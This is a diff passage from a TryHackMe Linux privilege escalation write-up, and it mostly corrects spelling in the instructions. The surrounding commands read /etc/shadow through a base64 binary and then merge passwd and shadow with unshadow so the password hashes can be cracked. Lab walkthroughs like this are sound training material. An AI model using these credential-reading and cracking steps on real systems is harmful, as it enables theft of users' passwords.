aisha-x/THM/Rooms/PT/Linux-privilege-escalation.md

 THM-3847834
 ```

-change the LFILE varible to whatever file you wish to read.
+Change the LFILE variable to whatever file you wish to read.
 ```bash
 LFILE=/etc/shadow
 $ ./base64 "$LFILE" | base64 --decode
 ```

-view both the `etc/shadow` and `etc/passwd`, then crack the users password using the `unshadow` tool.
+View both the `etc/shadow` and `etc/passwd`, then crack the user's password using the `unshadow` tool.
 ```bash
 unshadow passwd.txt shadow.txt > hash.txt